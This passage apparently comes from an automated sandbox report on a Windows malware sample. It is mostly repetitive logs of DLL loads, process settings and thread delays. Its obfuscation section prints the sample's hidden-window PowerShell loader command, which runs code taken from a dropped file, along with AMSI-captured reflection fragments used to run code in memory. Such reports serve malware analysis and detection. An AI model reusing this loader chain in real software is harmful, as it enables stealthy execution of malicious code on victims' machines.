          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: ln5S7fIBkY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Targetore.pdb$ source: powershell.exe, 00000002.00000002.2352305297.0000000008D6D000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Overmortgaging $Ventileringens $signis), (Pessimistens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Foresprgselen = [AppDomain]::CurrentDomain.GetAssemb
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($underldighederne)), $Stupendous1).DefineDynamicModule($lobed, $false).DefineType($Larkishly, $Terminalization72, [System.MulticastDele
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37DE7 push eax; iretd 2_2_07E37DE8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37DF2 push eax; iretd 2_2_07E37DF3
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E39145 push ebp; iretd 2_2_07E39146
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3834C pushad ; iretd 2_2_07E38356
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3835E pushad ; iretd 2_2_07E3835F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37B2A push eax; iretd 2_2_07E37B2B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E30D0F push eax; iretd 2_2_07E30D10
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E30D1A push eax; iretd 2_2_07E30D1B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E37B1F push eax; iretd 2_2_07E37B20
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3B6E6 pushad ; iretd 2_2_07E3B6F0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3B6F8 pushad ; iretd 2_2_07E3B6F9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E312C1 push eax; iretd 2_2_07E312C2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3AEC6 pushad ; iretd 2_2_07E3AED0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E3AED8 pushad ; iretd 2_2_07E3AED9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E312B6 push eax; iretd 2_2_07E312B7
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E33005 push eax; iretd 2_2_07E33006
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07E33010 push eax; iretd 2_2_07E33011
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09714173 pushad ; iretd 2_2_09714174
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09711B7A push eax; iretd 2_2_09711B7B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09714161 pushad ; iretd 2_2_0971416B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09711B6F push eax; iretd 2_2_09711B70
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971274E pushad ; iretd 2_2_0971274F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971273C pushad ; iretd 2_2_09712746
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971371C push eax; iretd 2_2_0971371D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097111E1 push 8BD68B50h; iretd 2_2_097111E6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097103C1 push 8BD68B50h; retf 2_2_097103C6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097143C3 pushad ; iretd 2_2_097143C4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097143B1 pushad ; iretd 2_2_097143BB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_097101A7 push eax; iretd 2_2_097101A8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971019C push eax; iretd 2_2_0971019D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0971105B pushad ; iretd 2_2_0971105C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\ln5S7fIBkY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
